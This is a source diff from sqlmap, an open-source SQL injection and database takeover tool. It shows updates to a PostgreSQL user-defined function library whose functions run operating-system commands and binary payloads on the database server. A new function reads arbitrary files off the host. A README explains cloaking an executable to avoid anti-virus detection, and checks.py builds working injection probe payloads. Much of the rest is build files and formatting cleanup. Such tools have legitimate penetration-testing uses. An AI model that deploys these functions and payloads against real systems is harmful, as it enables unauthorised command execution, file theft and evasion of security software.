+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib"
+				GenerateDebugInformation="false"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_mysqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_postgresqludf_sys", "lib_postgresqludf_sys\lib_postgresqludf_sys.vcproj", "{3527D58C-177A-47B3-981B-8104EBB3F943}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.ActiveCfg = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Debug|Win32.Build.0 = Debug|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.ActiveCfg = Release|Win32
+		{3527D58C-177A-47B3-981B-8104EBB3F943}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -47,7 +47,11 @@ PG_MODULE_MAGIC;
 #endif
 
 PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	int32 result = 0;
@@ -72,7 +76,11 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
 }
 
 PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	text *result_text;
 	int32 argv0_size;
@@ -112,15 +120,22 @@ extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
 	}
 
 	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#ifdef SET_VARSIZE
 	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
 	memcpy(VARDATA(result_text), result, strlen(result));
 
 	PG_RETURN_POINTER(result_text);
 }
 
 PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	size_t len;
@@ -190,3 +205,70 @@ DWORD WINAPI exec_payload(LPVOID lpParameter)
 	return 0;
 }
 #endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}

extra/udfhack/windows/lib_postgresqludf_sys/lib_postgresqludf_sys/lib_postgresqludf_sys.vcproj

@@ -0,0 +1,194 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_postgresqludf_sys"
+	ProjectGUID="{3527D58C-177A-47B3-981B-8104EBB3F943}"
+	RootNamespace="lib_postgresqludf_sys"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\Include;$(POSTGRESQL_SERVER_DIR)\include\server;$(POSTGRESQL_SERVER_DIR)\include\server\port\win32"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+				CompileAs="1"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalDependencies="postgres.lib"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib;$(POSTGRESQL_SERVER_DIR)\lib;$(POSTGRESQL_SERVER_DIR)\bin"
+				GenerateDebugInformation="false"
+				SubSystem="0"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\lib_postgresqludf_sys.c"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

lib/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/contrib/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/contrib/magic.py

@@ -10,8 +10,6 @@ Reference: http://hupp.org/adam/hg/python-magic
 License: PSF (http://www.python.org/psf/license/)
 """
 
-
-
 import os.path
 import ctypes
 import ctypes.util
@@ -42,7 +40,6 @@ class Magic:
 
         magic_load(self.cookie, magic_file)
 
-
     def from_buffer(self, buf):
         """
         Identify the contents of `buf`
@@ -66,7 +63,6 @@ class Magic:
         except Exception, _:
             pass
 
-
 _magic_mime = None
 _magic = None
 
@@ -96,8 +92,6 @@ def from_buffer(buffer, mime=False):
     m = _get_magic_type(mime)
     return m.from_buffer(buffer)
 
-
-
 try:
     libmagic = ctypes.CDLL(ctypes.util.find_library('magic'))
 
@@ -132,17 +126,14 @@ try:
     magic_file.argtypes = [magic_t, c_char_p]
     magic_file.errcheck = errorcheck
 
-
     _magic_buffer = libmagic.magic_buffer
     _magic_buffer.restype = c_char_p
     _magic_buffer.argtypes = [magic_t, c_void_p, c_size_t]
     _magic_buffer.errcheck = errorcheck
 
-
     def magic_buffer(cookie, buf):
         return _magic_buffer(cookie, buf, len(buf))
 
-
     magic_load = libmagic.magic_load
     magic_load.restype = c_int
     magic_load.argtypes = [magic_t, c_char_p]
@@ -162,7 +153,6 @@ try:
 except:
     pass
 
-
 MAGIC_NONE = 0x000000 # No flags
 
 MAGIC_DEBUG = 0x000001 # Turn on debugging

lib/contrib/multipartpost.py

@@ -22,8 +22,6 @@ License along with this library; if not, write to the Free Software
 Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import mimetools
 import mimetypes
 import os
@@ -39,7 +37,6 @@ class Callable:
     def __init__(self, anycallable):
         self.__call__ = anycallable
 
-
 # Controls how sequences are uncoded. If true, elements may be given
 # multiple values by assigning a sequence.
 doseq = 1
@@ -50,12 +47,14 @@ class MultipartPostHandler(urllib2.BaseHandler):
 
     def http_request(self, request):
         data = request.get_data()
+        
         if data is not None and type(data) != str:
             v_files = []
             v_vars = []
+            
             try:
                 for(key, value) in data.items():
-                    if type(value) == file:
+                    if type(value) == file or hasattr(value, 'file'):
                         v_files.append((key, value))
                     else:
                         v_vars.append((key, value))
@@ -75,16 +74,18 @@ class MultipartPostHandler(urllib2.BaseHandler):
             request.add_data(data)
         return request
 
-
     def multipart_encode(vars, files, boundary = None, buffer = None):
         if boundary is None:
             boundary = mimetools.choose_boundary()
+
         if buffer is None:
             buffer = ''
+
         for(key, value) in vars:
             buffer += '--%s\r\n' % boundary
             buffer += 'Content-Disposition: form-data; name="%s"' % key
             buffer += '\r\n\r\n' + value + '\r\n'
+
         for(key, fd) in files:
             file_size = os.fstat(fd.fileno())[stat.ST_SIZE]
             filename = fd.name.split('/')[-1]
@@ -95,9 +96,11 @@ class MultipartPostHandler(urllib2.BaseHandler):
             # buffer += 'Content-Length: %s\r\n' % file_size
             fd.seek(0)
             buffer += '\r\n' + fd.read() + '\r\n'
+
         buffer += '--%s--\r\n\r\n' % boundary
+
         return boundary, buffer
+
     multipart_encode = Callable(multipart_encode)
 
     https_request = http_request
-

lib/contrib/upx/windows/README.txt

@@ -0,0 +1,11 @@
+Due to the anti-virus positive detection of executable stored inside this
+folder,  we needed to somehow circumvent this. As from the plain sqlmap
+users perspective nothing has to be done prior to its usage by sqlmap, but
+if you want to have access to the original executable use the decrypt
+functionality of the ../../../../extra/cloak/cloak.py utility.
+
+To prepare the executable to the cloaked form use this command:
+python ../../../../extra/cloak/cloak.py -i upx.exe
+
+To get back the original executable use this:
+python ../../../../extra/cloak/cloak.py -d -i upx.exe_

lib/controller/__init__.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under

lib/controller/action.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.controller.handler import setHandler
 from lib.core.common import getHtmlErrorFp
 from lib.core.data import conf
@@ -35,7 +33,6 @@ from lib.techniques.blind.timebased import timeTest
 from lib.techniques.inband.union.test import unionTest
 from lib.techniques.outband.stacked import stackedTest
 
-
 def action():
     """
     This function exploit the SQL injection on the affected

lib/controller/checks.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 import re
 import time
 
@@ -35,11 +33,11 @@ from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.exception import sqlmapConnectionException
+from lib.core.exception import sqlmapNoneDataException
 from lib.core.session import setString
 from lib.core.session import setRegexp
 from lib.request.connect import Connect as Request
 
-
 def checkSqlInjection(place, parameter, value, parenthesis):
     """
     This function checks if the GET, POST, Cookie, User-Agent
@@ -71,11 +69,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
         payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt, postfix))
         trueResult = Request.queryPage(payload, place)
 
-        if trueResult == True:
+        if trueResult:
             payload = agent.payload(place, parameter, value, "%s%s%s AND %s%d=%d %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1, postfix))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "confirming custom injection "
                 infoMsg += "on %s parameter '%s'" % (place, parameter)
                 logger.info(infoMsg)
@@ -83,7 +81,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
                 payload = agent.payload(place, parameter, value, "%s%s%s AND %s%s %s" % (value, prefix, ")" * parenthesis, "(" * parenthesis, randStr, postfix))
                 falseResult = Request.queryPage(payload, place)
 
-                if falseResult != True:
+                if not falseResult:
                     infoMsg  = "%s parameter '%s' is " % (place, parameter)
                     infoMsg += "custom injectable "
                     logger.info(infoMsg)
@@ -97,11 +95,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s%s AND %s%d=%d" % (value, ")" * parenthesis, "(" * parenthesis, randInt, randInt + 1))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming unescaped numeric injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -109,7 +107,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "unescaped numeric injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -128,11 +126,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s'='%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming single quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -140,7 +138,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "single quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -159,11 +157,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s'%s AND %s'%s' LIKE '%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming LIKE single quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -171,7 +169,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s'%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "LIKE single quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -190,11 +188,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\"=\"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming double quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -202,7 +200,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s\"%s AND %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "double quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -221,11 +219,11 @@ def checkSqlInjection(place, parameter, value, parenthesis):
     payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr))
     trueResult = Request.queryPage(payload, place)
 
-    if trueResult == True:
+    if trueResult:
         payload = agent.payload(place, parameter, value, "%s\"%s AND %s\"%s\" LIKE \"%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr, randStr + randomStr(1)))
         falseResult = Request.queryPage(payload, place)
 
-        if falseResult != True:
+        if not falseResult:
             infoMsg  = "confirming LIKE double quoted string injection "
             infoMsg += "on %s parameter '%s'" % (place, parameter)
             logger.info(infoMsg)
@@ -233,7 +231,7 @@ def checkSqlInjection(place, parameter, value, parenthesis):
             payload = agent.payload(place, parameter, value, "%s\"%s and %s%s" % (value, ")" * parenthesis, "(" * parenthesis, randStr))
             falseResult = Request.queryPage(payload, place)
 
-            if falseResult != True:
+            if not falseResult:
                 infoMsg  = "%s parameter '%s' is " % (place, parameter)
                 infoMsg += "LIKE double quoted string injectable "
                 infoMsg += "with %d parenthesis" % parenthesis
@@ -247,7 +245,6 @@ def checkSqlInjection(place, parameter, value, parenthesis):
 
     return None
 
-
 def checkDynParam(place, parameter, value):
     """
     This function checks if the url parameter is dynamic. If it is
@@ -279,7 +276,6 @@ def checkDynParam(place, parameter, value):
 
     return condition
 
-
 def checkStability():
     """
     This function checks if the URL content is stable requesting the
@@ -298,15 +294,21 @@ def checkStability():
     time.sleep(1)
     secondPage, _ = Request.queryPage(content=True)
 
-    condition = firstPage == secondPage
+    condition = (firstPage == secondPage)
 
-    if condition == True:
+    if condition:
+        if firstPage:
             conf.md5hash = md5hash(firstPage)
-
             logMsg  = "url is stable"
             logger.info(logMsg)
+        else:
+            exceptionMsg   = "there was an error checking the stability of page "
+            exceptionMsg  += "because of lack of content. please check the "
+            exceptionMsg  += "page request results (and probable errors) by "
+            exceptionMsg  += "using higher verbosity levels"
+            raise sqlmapNoneDataException, exceptionMsg
 
-    elif condition == False:
+    elif not condition:
         warnMsg  = "url is not stable, sqlmap will base the page "
         warnMsg += "comparison on a sequence matcher, if no dynamic nor "
         warnMsg += "injectable parameters are detected, refer to user's "
@@ -316,7 +318,6 @@ def checkStability():
 
     return condition
 
-
 def checkString():
     if not conf.string:
         return True
@@ -347,7 +348,6 @@ def checkString():
 
         return False
 
-
 def checkRegexp():
     if not conf.regexp:
         return True
@@ -379,7 +379,6 @@ def checkRegexp():
 
         return False
 
-
 def checkConnection():
     infoMsg = "testing connection to the target url"
     logger.info(infoMsg)

lib/controller/controller.py

@@ -5,7 +5,7 @@ $Id$
 
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 
-Copyright (c) 2007-2009 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
 Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
 
 sqlmap is free software; you can redistribute it and/or modify it under
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 
-
-
 from lib.controller.action import action
 from lib.controller.checks import checkSqlInjection
 from lib.controller.checks import checkDynParam
@@ -32,6 +30,7 @@ from lib.controller.checks import checkString
 from lib.controller.checks import checkRegexp
 from lib.controller.checks import checkConnection
 from lib.core.common import paramToDict
+from lib.core.common import parseTargetUrl
 from lib.core.common import readInput
 from lib.core.data import conf
 from lib.core.data import kb
@@ -42,7 +41,6 @@ from lib.core.target import createTargetDirs
 from lib.core.target import initTargetEnv
 from lib.utils.parenthesis import checkForParenthesis
 
-
 def __selectInjection(injData):
     """
     Selection function for injection place, parameters and type.
